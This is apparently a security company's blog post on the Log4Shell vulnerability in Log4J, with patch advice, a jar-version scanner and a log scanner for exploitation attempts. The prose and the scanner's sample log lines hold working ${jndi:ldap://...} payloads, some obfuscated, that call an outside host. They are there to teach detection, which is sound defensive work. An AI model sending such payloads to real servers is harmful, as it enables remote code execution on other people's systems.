Log4J Security Issue

December 15, 2021

This post is a quick summary of the Log4J security issues happening in December 2021. It includes a summary, a video, a PDF of the slides we presented and extensive references.

The TL;DR is: update Log4J to 2.16.0 and keep watching for subsequent updates.

The 10,000 Foot View Summary of The Issue

Log4J is a widely used Java library.

It has a problem (CVE-2021-44228, widely called Log4Shell, affecting Log4J 2.x from 2.0-beta9 up to and including 2.14.1) where, if it is asked to log a specially crafted string, it will allow an attacker to run their own code on the targeted server. This can happen in both authenticated (where we know the user) and unauthenticated (anonymous) cases, depending on where the application logs input the user controls.

This issue is being actively probed and attacked.

The simplest fix is to patch. I expect further developments, so I recommend watching for additional updates.

The Rough Detail

Log4J is a logging library that is used in a wide array of applications. I probably used it in over half of the projects I’ve worked on in my career.

It is very normal for a developer to want to log something that a user enters. For example:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Both values are user-influenced; on Log4J 2.x before 2.16.0 a lookup
// string in either of them is resolved when the message is formatted.
String user = getCurrentUser();
String document = request.getParameter("Document");
Logger logger = LogManager.getLogger(Thing.class.getName());
logger.debug("User {} requested document: {}", user, document);

That log statement, where the user-supplied values are put into the log message, is where the problem occurs. If the document parameter contains a string of the form ${jndi:ldap://attacker-controlled-host/x}, a vulnerable version of Log4J resolves the lookup, connects to the attacker's server and can load and run a class it hands back. Using the {} placeholders does not help, because the lookup is performed on the formatted message. One clear problem is that these statements are basically everywhere in code and it would be nearly impossible to audit all of them.

The fix is basically to use a version of Log4J that doesn't do the lookup magic on the malicious string by default: 2.16.0 removes message lookups entirely and disables JNDI by default. Alternatives are to tell an older version (2.10 and later) you don't want that feature, by setting the log4j2.formatMsgNoLookups system property or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true, keeping in mind that this setting was later found insufficient in some non-default configurations (CVE-2021-45046), which is why 2.16.0 is the recommendation. Or, in extreme cases, to rip the offending JndiLookup class right out of the log4j-core jar.

There are a variety of ways to scan for the issue, and to identify log4j library versions locally. Even a simple approach of looking at dependencies (for example mvn dependency:tree or gradle dependencies) could help, as long as you remember that log4j-core also arrives transitively and inside packaged wars, ears and fat jars.
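As an added example (not code from the original post or from Jemurai), here is a small Python scanner along the lines of the approaches described above. It walks a directory tree, opens every jar/war/ear, recurses into archives nested inside them (a common place for a forgotten log4j-core), reads the log4j-core version from the jar's Maven pom.properties, checks whether JndiLookup.class is present, and classifies the result against this post's 2.16.0 advice. It also implements the "rip the class out" mitigation from the previous paragraph as strip_jndi_lookup. The jars built in run_demo are constructed stand-ins holding only the entries the scanner inspects, not real log4j artifacts; the paths, file names and verdict strings are this example's own.

```python
"""Added example (not the article's code): find log4j-core jars on disk, including
jars nested inside wars/ears, report version and JndiLookup.class presence,
and optionally strip that class as the 'rip it out' mitigation."""
import io, os, re, tempfile, zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None

def log4j_version(zf):
    """Version string from the Maven pom.properties shipped in the jar, or None."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None

def assess(version, has_jndi_class):
    """Classify one log4j-core jar against this post's advice (2.16.0 or later)."""
    v = parse_version(version)
    if v is None:
        return "unknown version, JndiLookup.class " + ("present" if has_jndi_class else "absent")
    if v < (2, 0, 0):
        return "log4j 1.x: not affected by this issue, but end-of-life"
    if v >= (2, 16, 0):
        return "ok"
    if not has_jndi_class:
        return "mitigated (JndiLookup.class removed), upgrade anyway"
    return "VULNERABLE: upgrade to 2.16.0 or later"

def scan_archive(zf, label, results):
    """Record a finding for this archive, then recurse into archives nested in it."""
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = log4j_version(zf)
        results.append((label, version, assess(version, JNDI_CLASS in names)))
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            data = io.BytesIO(zf.read(name))
            if zipfile.is_zipfile(data):
                scan_archive(zipfile.ZipFile(data), f"{label}!{name}", results)

def scan_tree(root):
    """Walk a directory tree; return [(label, version, verdict), ...] sorted by label."""
    results = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            path = os.path.join(dirpath, f)
            if f.lower().endswith(ARCHIVE_EXT) and zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    scan_archive(zf, os.path.relpath(path, root).replace(os.sep, "/"), results)
    return sorted(results, key=lambda r: r[0])

def strip_jndi_lookup(path):
    """Rewrite the jar in place without JndiLookup.class (back it up first).
    Returns True if the class was present and removed."""
    with zipfile.ZipFile(path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        kept = [(i, src.read(i.filename)) for i in src.infolist() if i.filename != JNDI_CLASS]
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as dst:
        for info, data in kept:
            dst.writestr(info, data)
    return True

def make_jar(version=None, with_jndi=False, extra=None):
    """Constructed stand-in jar (NOT real log4j) holding only the entries we inspect."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # fake class-file bytes
        for name, data in (extra or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()

def run_demo():
    """Lay out a constructed tree in a temp dir, strip one jar, scan: (stripped, {label: verdict})."""
    fixture = {
        "lib/log4j-core-2.14.1.jar": make_jar("2.14.1", True),
        "lib/log4j-core-2.16.0.jar": make_jar("2.16.0", True),
        "lib/commons-io-2.11.0.jar": make_jar(extra={"org/apache/commons/io/IOUtils.class": b""}),
        "vendor/log4j-core-2.14.1.jar": make_jar("2.14.1", True),
        "app.war": make_jar(extra={"WEB-INF/lib/log4j-core-2.11.2.jar": make_jar("2.11.2", True)}),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in fixture.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        stripped = strip_jndi_lookup(os.path.join(root, "vendor/log4j-core-2.14.1.jar"))
        return stripped, {label: verdict for label, _v, verdict in scan_tree(root)}
```

On a real host you would call scan_tree on the application root (for example scan_tree("/opt/app")) and act on every VULNERABLE line; run_demo shows the expected output shape on the constructed tree, including the jar hidden inside app.war and the vendor jar reported as mitigated after the class was stripped. Version detection relies on pom.properties being present, so shaded or repackaged jars can come back as "unknown version" and need a manual look.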

Timeline

The vulnerability was disclosed to the Apache Log4J security team on November 24, 2021.

It was publicly disclosed on December 10.

Patches 2.15.0 and 2.16.0 have been released since then (2.15.0 turned message lookups off by default; 2.16.0 removed them entirely and disabled JNDI by default).

I would look in log files from November forward for exploitation attempts (strings containing ${jndi:, in many obfuscated spellings) as soon as possible.
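To make that log review concrete, here is an added Python example (not from the original post or from Jemurai) that scans log lines for JNDI lookup strings. Attackers quickly started hiding the payload behind nested lookups such as ${${lower:j}ndi:...} and ${${::-j}${::-n}${::-d}${::-i}:...}, and web access logs usually hold it URL-encoded, so the scanner decodes and collapses those forms the way Log4J's own substitution would before matching. The log lines in SAMPLE_LOG are constructed samples in Apache access-log format, with documentation-range IP addresses; the function names are this example's own.

```python
"""Added example (not the article's code): hunt log lines for Log4Shell-style
JNDI lookups, including URL-encoded and nested-lookup obfuscations."""
import re
from urllib.parse import unquote

# Innermost ${...} expression: no nested "${" inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are actually hunting for once the obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(match):
    """Collapse one innermost lookup roughly the way Log4J's substitutor would."""
    body = match.group(1)
    if body.strip().lower().startswith("jndi:"):
        return match.group(0)            # keep the thing we want to find
    if ":-" in body:                     # ${x:-d}, ${::-d}, ${env:NOPE:-d} -> d
        return body.split(":-", 1)[1]
    low = body.lower()
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    return match.group(0)                # ${date:...}, ${java:...}: leave alone

def normalize(text, max_rounds=25):
    """URL-decode (repeatedly) and resolve nested lookups from the inside out."""
    for _ in range(3):                   # handle double-encoded payloads
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):          # bounded: each round removes a layer
        collapsed = _INNER.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text

def find_jndi(line):
    """Return the normalized line if it carries a JNDI lookup, else None."""
    norm = normalize(line)
    return norm if _JNDI.search(norm) else None

def scan_lines(lines):
    """Return [(1-based line number, normalized line)] for every hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = find_jndi(line)
        if norm is not None:
            hits.append((number, norm))
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:03:15:22 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [11/Dec/2021:03:16:01 +0000] "GET /%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.5 - - [11/Dec/2021:03:17:40 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, norm in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {norm}")
```

Run against the sample it flags lines 2, 3 and 4 and leaves the benign ${date:yyyy} lookup alone; the point of reporting the normalized line rather than the raw one is that the analyst sees the real callback host and port. Pipe real logs in with scan_lines(open(path)), and remember that this looks only at the request fields a web server writes: headers such as User-Agent and X-Forwarded-For were popular injection points, so make sure your log format captures them.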

A Video

I put together this 17 minute video overview that covers:

  • The issue
  • The payload
  • Fixes
  • Things you want to check
  • References

The Slides

If you want to read and navigate yourself, the slides are here.

References

We looked at a lot of sources as we navigated this issue. Here are some that we thought were helpful:


Matt Konda

Founder and CEO of Jemurai


© 2012-2024 Jemurai. All rights reserved.